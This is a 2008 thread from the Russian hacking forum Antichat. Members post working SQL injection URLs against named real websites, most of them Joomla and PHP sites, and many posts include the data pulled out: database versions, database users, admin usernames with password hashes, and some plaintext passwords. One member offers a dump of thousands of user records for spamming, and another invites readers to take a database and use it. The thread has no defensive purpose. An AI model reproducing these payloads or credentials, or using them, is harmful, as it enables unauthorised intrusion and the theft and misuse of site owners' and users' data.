Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.06.2008, 06:00
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,4,5/*
Админка
http://www.bocharik.ru/admin
Версия
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(version()+using+koi8r ),5/*
Юзер
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(user()+using+koi8r),5/*
Имя бд
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(DATABASE()+using+koi8 r),5/*
Спасибо, nex0 je0n
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(concat_ws(0x3a,userna me,user_password)+using+koi8r),5+from+phpbb_users+ where+user_level=1+limit+0,1/*
/admin/ - пасс от форума,которого нет, подойдет к админке
Bocharik:94edcb5a40e5cb07f1428ded09fc62b7:gjlpfvrj v
to /admin/ - admin:gjlpfvrjv
Последний раз редактировалось Sandjuro; 15.07.2008 в 04:34..
|
|
|
29.06.2008, 07:18
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
PR 2
http://jptweb.com/projects/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())/*
version(): 5.0.24a-standard-log
user(): jpthome@lankershim.dreamhost.com
database(): jpthome
http://jptweb.com/projects/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+null,2,3,4,concat(username,0x3a,pas sword)+from+jos_users/*
admin:9b9b2642fd71dc42744cba369fb22120
PR 2
http://www.pinkladylegend.com/index.php?option=com_jabode&task=sign&sign=taurus& id=-3+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--&Itemid=3
version(): 5.0.58
user(): pinklady@localhost
database(): pinklady
http://www.pinkladylegend.com/index.php?option=com_jabode&task=sign&sign=taurus& id=-3+union+select+1,2,3,4,concat(username,0x3a,passwo rd)+FROM+jos_users--&Itemid=3
admin:9f751204e5080f66b7c5d77c0791ca8d:3wmSYj6vHBR kaick
PR 2
http://www.l2u.co.uk/index.php?option=com_jabode&task=sign&sign=leo&id=-2+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())&Itemid=151
version(): 4.1.20-community-nt
user(): locallytoyou@localhost
database(): locallytoyou
PR 2
http://soulwithstyle.com/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--
version(): 5.0.24a-standard-log
user(): soul@apache2-cabo.fiero.dreamhost.com
database(): soul
http://soulwithstyle.com/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat(username,0x3a,passwo rd)+from+jos_users--
admin:0f138c43fd44179b1380f1f0aaf88e3c:NGLGxwIecZY qjkOM
PR 0 ='(
http://charlestownalumni.net/cms/index.php?option=com_jabode&task=sign&sign=caprico rn&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--
version(): 4.1.22-standard
user(): chsalum_joom1@localhost
database(): chsalum_joom1
http://charlestownalumni.net/cms/index.php?option=com_jabode&task=sign&sign=caprico rn&id=-4+union+select+1,2,3,4,concat(username,0x3a,passwo rd)+FROM+jos_users--
chsalum:7e027f88756af54c4e987d13395b7fbf:ZjMUi8erH WoIxFey
PR 0 ='(
http://www.latvianusa.com/index.php?option=com_jabode&task=sign&sign=sagitta rius&id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--&Itemid=999
version(): 4.1.22-standard
user(): latvianu_jUser@localhost
database(): latvianu_joomlaDB
|
|
|
|
29.06.2008, 09:10
|
|
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157
Репутация:
247
|
|
PR 0
http://jacellular.com/main/index.php?option=com_jabode&task=sign&sign=cancer& id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), %20user(),database())--
version() : 5.0.45-community-log
user() : jacellul_joom1@localhost
database() : jacellul_joom1
thnx to gisTy
|
|
|
|
29.06.2008, 21:35
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
http://cjcity.ru/base/song.php?id=1'+UNION+SELECT+1,2,3,concat_ws(0x3a,u sername,password,icq,email),5+from+users/*
Лиса аж подвисла ненадолго от кол-ва или хз от чего =)
Если кому уж очень надо эту базу(5908 юзверей) (для спама или вообще хз для чего) то просто стукните в личку я скину в .txt... Ну думаю никому и не надо 
|
|
|
|
29.06.2008, 21:44
|
|
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132
Репутация:
63
|
|
http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+and+1=2+union+s elect+1,2,version(),4,5,user(),7,8,9,10
cпс jokester
НИмогу капнутЬ дальше
version(): 4.1.21
user() :rgufk@localhost
|
|
|
|
29.06.2008, 21:56
|
|
Участник форума
Регистрация: 24.06.2008
Сообщений: 235
Провел на форуме:
573676
Репутация:
113
|
|
Код:
http://www.bedro1075.co.kr/bbs1/login.php?id=issue&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&s_url=%2Fbbs1%2Fview.php%3Fid%3Dissue%26no%3D2
дальше не знаю как- я еще ток начал.... |
|
|
|
30.06.2008, 00:13
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
PR 4
определяем кол-во колонок:
http://www.loglar.com/song.php?id=12198+order+by+8/*
но при запросе
http://www.loglar.com/song.php?id=-12198+union+select+1,2,3,4,5,6,7,8/*
нам ничего не выводит, так как вывод ошибок отключен.. следовательно можно предположить что версия мускула - 3.ъ, т.к. в ней не былшо конструкции union.. кто раскрутит до конца отпишитесь, просто самому уже интересно
PR 4
http://www.lyricsprovider.com/song.php?id=-3377+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,ver sion(),user(),database())--
version(): 5.0.51-2.dotdeb.0-log
user(): lyricsprovider@localhost
database(): lyricsprovider
http://www.lyricsprovider.com/song.php?id=-3377+union+select+1,2,3,null,null,6,concat_ws(0x3a 3a,fldAuto,name,pwd,admin,emailaddress,fullname)+f rom+lyricsprovider.ads_user--
3 юзверя..
http://www.lyricsprovider.com/song.php?id=-3377+union+select+1,2,3,null,null,6,concat_ws(0x2e ,guest_email)+from+lyricsprovider.guests--
вот тут уже побольше будет, но тут в основном тольок мыльники
PR 3
http://www.harptabs.com/song.php?ID=-164+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, version(),user(),database()),10,11,12,13,14,15,16, 17/*
version(): 5.0.45-community-log
user(): harptabs_harptab@localhost
database(): harptabs_com
http://www.harptabs.com/song.php?ID=-164+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, Username,Password,Email),10,11,12,13,14,15,16,17+f rom+harptabs_com.Member+limit+5939,1/*
в базе 5939 записи=) сливайте, юзайте=)
PR 3
http://www.vietsky.com/music/song.php?id=-6254+union+select+1,concat_ws(0x3a3a,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29/*
version(): 4.1.22-standarđlog
user(): vietsky_khoalan@localhost
database(): vietsky_music
PR 2
http://demoscene.stg7.net/lyrics/song.php?id=-50+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11/*
version():5.0.24a-standard-log
user(): stage7@temple.dreamhost.com
dtatabase(): demolyrics
PR 2
http://duhovskoi.ru/songs/song.php?id=-38+union+select+1,2,3,4,concat_ws(0x3a3a3a,version (),user(),database()),6,7,8,9/*
version(): 4.1.21-community-max-nt-log
user(): 1gb_duhovskoi@10.0.1.17
database(): 1gb_duhovskoi
PR 0 ='(
http://fungens.com/generators/poll/poll.php?action=show_results&poll_id=-13+union+select+concat_ws(0x3a3a,version(),user(), database()),2/*
version(): 5.0.45-log
user():dbo225707050@74.208.16.77
database(): db225707050
бд почти пустая.. там есть одна табличка.. да и та не интересная..
Последний раз редактировалось gisTy; 30.06.2008 в 03:56..
|
|
|
|
30.06.2008, 03:06
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
PR: 1
Код:
http://www.oke.ru/xo4u.php?id=-42708+union+select+1,2,3,4,5,6,7,8,9,10/*
Код:
http://www.oke.ru/xo4u.php?id=-42708+union+select+1,2,version(),4,User(),6,7,8,9,10/*
User:gsokecomru@localhost
Version:5.1.16-beta-log
-------------------------------------------------------------
PR: 7
Код:
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,2,3,4,5,6,7/*
Код:
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,version(),user(),4,5,6,7/*
User:dbo158065722@212.227.118.42
Version:5.0.45-log
-------------------------------------------------------------
PR: 7
Код:
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-240+union+select+1,2/*
Код:
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-240+union+select+user(),version()/*
User:linspire@10.0.0.205
Version:4.0.24-standard-log
-------------------------------------------------------------
MSSQL_InJection:
PR: 6
Код:
http://www.thechicagocouncil.org/dynamic_page.php?id=64'
-------------------------------------------------------------
PR: 6
Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,unhex(hex(concat_ws(0x3a,Version(),user()))),4,5,6,7,8,9,10,11/*
User:wfsj@localhost
Version:4.1.7-nt
-------------------------------------------------------------
PR: 5
Код:
http://www.thejerusalemfund.org/images/informationbrief.php?ID=-192+union+select+concat_ws(0x3a,version(),user())/*
User:hijab@localhost
Version:4.0.27-log
-------------------------------------------------------------
PR: 6
Код:
http://www.choices.edu/resources/detail.php?id=-49+union+select+1,convert(concat_ws(0x3a,version(),user())+using+latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
User:choices@charlie.services.brown.edu
Version:4.1.14-log
-------------------------------------------------------------
PR: 6
Код:
http://www.allianceforbiz.com/events/specific_event.php?id=-89+union+select+concat_ws(0x3a,version(),user()),2,3,4,5,6,7,8,9/*
User:alliance_shows@localhost
Version:4.1.22-standard
-------------------------------------------------------------
PR: 5
http://www.fip.org/CONGRESS/beijing2007/index.php?id=-600+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20/*
Код:
http://www.fip.org/CONGRESS/beijing2007/index.php?id=-600+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
User:fip@localhost
Version:4.1.20
---------------------------------------------------------------
PR: 6
Код:
http://www.eutrainingsite.com/open_details.php?id=-19+union+select+1,version(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*
Version:5.0.22-Debian_0ubuntu6.06.10-log
User:eutrsite@localhost
Все таблицы:
Код:
http://www.eutrainingsite.com/open_details.php?id=-19+union+select+1,table_name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+information_schema.tables+limit+18,1/*
Тут порядком 60 мыльников:
http://www.eutrainingsite.com/open_details.php?id=-19+union+select+1,concat_ws(0x3a,id,email,password ),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1+from+cusers+where+id=1/*
community@eutrainingsite.com:comm08em
----------------------------------------------------------------
Код:
http://www.michaelpollan.com/article.php?id=-87+union+select+1,2,3,4,5,6,7,8,9,10/*
-----------------------------------------------------------------
PR: 5
Код:
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(version()+using+latin1),5,6,7,8,9,10,11/*
Код:
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,concat_ws(0x3a,id,username,password,email),5,6,7,8,9,10,11+from+users+where+id=1/*
admin:4dm1n {админку я так и не нашел,может пароль к ftp подойдет,но я даже пробовал =)}
----------------------------------------------------------------
http://www.clasp.org/publications.php?id=-6+union+select+1,2,version(),4,5,6,7,8,9,10,1,1,1, 1,1/*
|
|
|
|
30.06.2008, 10:26
|
|
Новичок
Регистрация: 30.03.2008
Сообщений: 19
Провел на форуме:
95226
Репутация:
10
|
|
http://www.phpbuddy.com/article.php?id=999999999+union+select+1,2,3,4,5,6/*
Поля и таблицы не смог подобрать 
|
|
|
|
30.06.2008, 13:59
|
|
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157
Репутация:
247
|
|
ukrgazeta.plus.org.ua
PR 3
http://ukrgazeta.plus.org.ua/print.php?ida=99999999999+union+select+1,2,3,user( ),version(),database()/*
Подобрал только одну таблицу: article(ida,text)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
